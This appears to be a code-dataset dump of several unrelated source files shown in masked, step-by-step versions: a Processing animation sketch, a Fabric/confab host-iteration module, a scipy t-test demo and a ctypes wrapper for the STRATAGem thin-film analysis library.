"step-3": "<mask token>\n\n\ndef setup():\n size(800, 800)\n colorMode(HSB, 360, 1, 1, 1)\n background(140, 0.49, 0.75)\n frameRate(30)\n noStroke()\n\n\ndef draw():\n global h, xorg, yoff, xcount, xvel\n if frameCount % 10 == 0:\n fill(140, 0.49, 0.75, 0.2)\n square(0, 0, width)\n pushMatrix()\n translate(xorg, yoff)\n y = sin(frameCount % 20 / 20.0 * PI + PI) * h\n if frameCount % 20 == 0 and frameCount > 0:\n h -= 50\n if h <= 0:\n fill(0)\n ellipse(xcount, y, 25, 10)\n fill(0, 0, 1)\n circle(xcount, y, 5)\n yoff = random(300, 700)\n xcount = 0\n xvel = random(1, 3)\n if random(1) > 0.5:\n xvel *= -1\n xorg = random(400, 600)\n else:\n xorg = random(50, 400)\n h = int(random(3, 7)) * 50\n else:\n fill(0, 0, 1)\n circle(xcount, y, 5)\n xcount += xvel\n popMatrix()\n saveFrame('frames/####.jpg')\n if frameCount > 700:\n noLoop()\n",
"step-4": "h = 160\nxorg = 0\nyoff = 400\nxcount = 0\nxvel = 2\n\n\ndef setup():\n size(800, 800)\n colorMode(HSB, 360, 1, 1, 1)\n background(140, 0.49, 0.75)\n frameRate(30)\n noStroke()\n\n\ndef draw():\n global h, xorg, yoff, xcount, xvel\n if frameCount % 10 == 0:\n fill(140, 0.49, 0.75, 0.2)\n square(0, 0, width)\n pushMatrix()\n translate(xorg, yoff)\n y = sin(frameCount % 20 / 20.0 * PI + PI) * h\n if frameCount % 20 == 0 and frameCount > 0:\n h -= 50\n if h <= 0:\n fill(0)\n ellipse(xcount, y, 25, 10)\n fill(0, 0, 1)\n circle(xcount, y, 5)\n yoff = random(300, 700)\n xcount = 0\n xvel = random(1, 3)\n if random(1) > 0.5:\n xvel *= -1\n xorg = random(400, 600)\n else:\n xorg = random(50, 400)\n h = int(random(3, 7)) * 50\n else:\n fill(0, 0, 1)\n circle(xcount, y, 5)\n xcount += xvel\n popMatrix()\n saveFrame('frames/####.jpg')\n if frameCount > 700:\n noLoop()\n",
"step-5": "h = 160\nxorg = 0\nyoff = 400\nxcount = 0\nxvel = 2\n\ndef setup():\n size(800, 800)\n colorMode(HSB, 360, 1, 1, 1)\n background(140, 0.49, 0.75)\n frameRate(30)\n noStroke()\n\ndef draw():\n global h, xorg, yoff, xcount, xvel\n if frameCount % 10 == 0:\n fill(140, 0.49, 0.75, 0.2)\n square(0,0,width)\n pushMatrix()\n translate(xorg,yoff)\n y = sin((frameCount%20)/20.0*PI+PI)*h\n if (frameCount % 20 == 0 and frameCount > 0):\n h -= 50\n if h <= 0:\n fill(0)\n ellipse(xcount, y, 25, 10)\n fill(0,0,1)\n circle(xcount, y, 5)\n yoff = random(300, 700)\n xcount = 0\n xvel = random(1,3)\n if random(1)>0.5:\n xvel *= -1\n xorg = random(400,600)\n else:\n xorg = random(50,400)\n h = int(random(3,7))*50\n else:\n fill(0,0,1)\n circle(xcount, y, 5)\n xcount += xvel\n popMatrix()\n \n saveFrame(\"frames/####.jpg\")\n if frameCount > 700:\n noLoop()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Iterations over :term:`hosts<host>`, :term:`roles<role>`,
:term:`components<component>` and config files.
"""
from contextlib import contextmanager
from fabric.api import env, settings, abort
from os.path import join
from pkg_resources import iter_entry_points
from warnings import warn
from fabric.network import ssh_config
from confab.options import options
from confab.validate import assert_exists
from confab.loaders import FileSystemEnvironmentLoader
from confab.data import DataLoader
from confab.conffiles import ConfFiles
@contextmanager
def this_hostname(hostname):
"""
Context manager that uses the current SSH confg to switch Fabric to a specific hostname.
Updates hostname and port.
"""
host_config = ssh_config(hostname)
host_string = hostname
port = host_config.get("port", env.default_port)
with settings(host_string=host_string,
port=port):
yield
def _get_environmentdef():
"""
Retreive the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort("Environment needs to be configured")
environmentdef = env.environmentdef
# If we're running via `fab`, we should restrict the environment
# to the current host.
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
# fabric needs the host if we're calling from main()
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
# fabric needs the host if we're calling from main()
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
# Construct directories
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()), directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role,
FileSystemEnvironmentLoader(*templates_dirs),
DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group="confab.extensions"):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
|
normal
|
{
"blob_id": "cc019c732003ed72db80a7893096a0bef0f12e47",
"index": 4168,
"step-1": "<mask token>\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\n<mask token>\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-2": "<mask token>\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-3": "<mask token>\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n host_string = hostname\n port = host_config.get('port', env.default_port)\n with settings(host_string=host_string, port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-4": "<mask token>\nfrom contextlib import contextmanager\nfrom fabric.api import env, settings, abort\nfrom os.path import join\nfrom pkg_resources import iter_entry_points\nfrom warnings import warn\nfrom fabric.network import ssh_config\nfrom confab.options import options\nfrom confab.validate import assert_exists\nfrom confab.loaders import FileSystemEnvironmentLoader\nfrom confab.data import DataLoader\nfrom confab.conffiles import ConfFiles\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n host_string = hostname\n port = host_config.get('port', env.default_port)\n with settings(host_string=host_string, port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-5": "\"\"\"\nIterations over :term:`hosts<host>`, :term:`roles<role>`,\n:term:`components<component>` and config files.\n\"\"\"\nfrom contextlib import contextmanager\nfrom fabric.api import env, settings, abort\nfrom os.path import join\nfrom pkg_resources import iter_entry_points\nfrom warnings import warn\n\nfrom fabric.network import ssh_config\n\nfrom confab.options import options\nfrom confab.validate import assert_exists\nfrom confab.loaders import FileSystemEnvironmentLoader\nfrom confab.data import DataLoader\nfrom confab.conffiles import ConfFiles\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n\n host_string = hostname\n port = host_config.get(\"port\", env.default_port)\n\n with settings(host_string=host_string,\n port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort(\"Environment needs to be configured\")\n\n environmentdef = env.environmentdef\n\n # If we're running via `fab`, we should restrict the environment\n # to the current host.\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n\n for host in environmentdef.hosts():\n # fabric needs the host if we're calling from main()\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n\n for host_and_role in environmentdef.all():\n # fabric needs the host if we're calling from main()\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n\n # Construct directories\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()), directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n\n return ConfFiles(host_and_role,\n FileSystemEnvironmentLoader(*templates_dirs),\n DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import numpy as np
from scipy import stats
a = np.random.normal(25.0, 5.0, 10000)
b = np.random.normal(26.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # bad change, with a ery low chance of randomness
b = np.random.normal(25.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # no change, outcome is likely random
|
normal
|
{
"blob_id": "ba85f3c8a9e40f30076c13487a97567f7bc646dc",
"index": 8041,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(stats.ttest_ind(a, b))\n<mask token>\nprint(stats.ttest_ind(a, b))\n",
"step-3": "<mask token>\na = np.random.normal(25.0, 5.0, 10000)\nb = np.random.normal(26.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\nb = np.random.normal(25.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\n",
"step-4": "import numpy as np\nfrom scipy import stats\na = np.random.normal(25.0, 5.0, 10000)\nb = np.random.normal(26.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\nb = np.random.normal(25.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\n",
"step-5": "import numpy as np\r\nfrom scipy import stats\r\n\r\na = np.random.normal(25.0, 5.0, 10000)\r\nb = np.random.normal(26.0, 5.0, 10000)\r\n\r\nprint(stats.ttest_ind(a, b)) # bad change, with a ery low chance of randomness\r\n\r\nb = np.random.normal(25.0, 5.0, 10000)\r\nprint(stats.ttest_ind(a, b)) # no change, outcome is likely random\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Stratagem:
<|reserved_special_token_0|>
def __init__(self, dll_path=None, display_error=True):
"""
:arg dll_path: complete path to the location of ``stratadllogger.dll``
(optional). If ``None``, the path is found in the Windows registry
under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not
found a :class:`StratagemError` is raised.
:type dll_path: :class:`str`
:arg display_error: whether to display a message dialog on error
:type display_error: :class:`bool`
"""
if dll_path is None:
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY
) as key:
basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]
dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
cwd = os.getcwd()
try:
logger.debug('dll=%s', dll_path)
self._lib = c.WinDLL(dll_path)
finally:
os.chdir(cwd)
logger.debug('StEnableErrorDisplay(%r)', display_error)
self._lib.StEnableErrorDisplay(c.c_bool(display_error))
self._key = None
self._cwd = os.getcwd()
self._layers = {}
self._substrate = None
self._experiments = {}
self._tmpstandards = []
def __enter__(self):
self.init()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
<|reserved_special_token_0|>
def _raise_error(self, alternate=''):
"""
Raises a :class:`StratagemError`.
The error code and message of known errors are retrieved from STRATAGem.
If this is not possible, *alternate* is used as the error message.
"""
errnum_ = c.c_ulong()
errtype_ = c.c_int()
self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
if errnum_.value != 0:
if errtype_.value == 0:
buf_ = c.create_string_buffer(256)
self._lib.StGetMsg(errnum_, buf_, 256)
raise StratagemError(buf_.value.decode('ascii'))
elif errtype_.value == 1:
raise c.WinError(errtype_.value)
else:
raise StratagemError('Error %i' % errnum_.value)
else:
raise StratagemError(alternate)
<|reserved_special_token_0|>
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
<|reserved_special_token_0|>
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = sample.substrate, index
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug('StSdAddLayer(key)')
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug('StSdAddLayer(key, %i)', ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error('Cannot add layer')
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error('Cannot add element')
z, wf = value
nra_ = c.c_int(z)
logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error('Cannot set atomic number')
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error('Cannot set concentration')
logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)
):
self._raise_error('Cannot set concentration flag')
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1000.0
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 10000000000.0
mass_thickness = layer.mass_thickness_kg_m2 * 0.1
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error('Cannot set thickness')
return int(ilayer_)
def _create_standard(self, standard):
"""
Internal method to create a new object defining the standard
:class:`.Sample`.
"""
key_ = self._stobjectnew(standard=True)
for layer in standard.layers:
self._add_layer(layer, substrate=False, key=key_)
self._add_layer(standard.substrate, substrate=True, key=key_)
filename = key_.value.decode('ascii') + '.tfs'
filepath = os.path.join(self.get_standard_directory(), filename)
filepath_ = c.create_string_buffer(filepath.encode('ascii'))
logger.debug('StObjectWriteFile(key, %s)', filepath)
if not self._lib.StObjectWriteFile(key_, filepath_):
self._raise_error('Cannot save standard')
self._lib.StObjectDelete(key_)
self._tmpstandards.append(filepath)
return filepath
@_check_key
def add_experiment(self, experiment):
"""
Adds an experiment, i.e. measurements of k-ratio at different energies.
.. hint:: Use :meth:`reset` method to remove defined experiments.
:arg experiment: experiment
:type experiment: :class:`Experiment`
"""
nra_ = c.c_int(experiment.z)
klm_ = c.c_int(experiment.line)
hv_ = c.c_double(experiment.energy_eV / 1000.0)
ielt_ = c.c_int()
iline_ = c.c_int()
iexpk_ = c.c_int()
logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,
experiment.line)
if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.
byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
self._raise_error('Cannot add atomic number and line')
standard = experiment.standard
if isinstance(standard, Sample):
standard = self._create_standard(standard)
standard_ = c.create_string_buffer(standard.encode('ascii'))
logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,
iline_.value, klm_.value, standard)
if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_
):
self._raise_error('Cannot set standard')
analyzed = experiment.is_analyzed()
analyzed_ = c.c_bool(analyzed)
logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)
if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
self._raise_error('Cannot add experiment analyzed flag')
kratio_ = c.c_double(experiment.kratio)
logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',
ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /
1000.0, experiment.energy_eV / 1000.0, experiment.kratio)
if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,
hv_, kratio_, c.c_double(0.0), c.c_int(2)):
self._raise_error('Cannot set experiment k-ratio')
if experiment.is_analyzed():
indexes = ielt_.value, iline_.value, iexpk_.value
self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@_check_key
def get_prz_mode(self):
"""
Returns the type of model to use for the :math:`\\phi(\\rho z)`.
:return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
:data:`PRZMODE_GAU`
:rtype: :class:`int`
"""
return self._lib.StGetPrzMode()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@_check_key
def get_fluorescence(self):
"""
Returns the fluorescence flag.
:return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
or :data:`FLUORESCENCE_LINE_CONT`
:rtype: :class:`int`
"""
return self._lib.StGetFluorFlg()
<|reserved_special_token_0|>
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
@_check_key
def get_standard_directory(self):
"""
Returns the directory where standard files are stored.
:rtype: :class:`str`
"""
dirpath = (c.c_char * 256)()
self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
return dirpath.value.decode('ascii')
<|reserved_special_token_0|>
@_check_key
def compute_kratio_vs_thickness(self, layer, thickness_low_m,
thickness_high_m, step):
"""
Computes the variation of the k-ratio as a function of the thickness
for a layer.
:arg layer: layer of a sample (must have been previously added)
:type layer: :class:`.Layer`
:arg thickness_low_m: lower limit of the thickness in meters
:type thickness_low_m: :class:`float`
:arg thickness_high_m: upper limit of the thickness in meters
:type thickness_high_m: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of thicknesses
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each thickness
"""
logger.debug('StSetKvsThicknessUnit(2)')
self._lib.StSetKvsThicknessUnit(2)
if layer not in self._layers:
raise ValueError('Unknown layer')
ilayer = self._layers[layer]
ilayer_ = c.c_int(ilayer)
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
low_ = c.c_double(thickness_low_m * 1000000000.0)
high_ = c.c_double(thickness_high_m * 1000000000.0)
